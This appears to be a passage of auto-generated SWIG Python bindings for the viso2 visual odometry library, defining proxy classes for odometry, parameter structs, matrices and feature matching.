return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
| # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
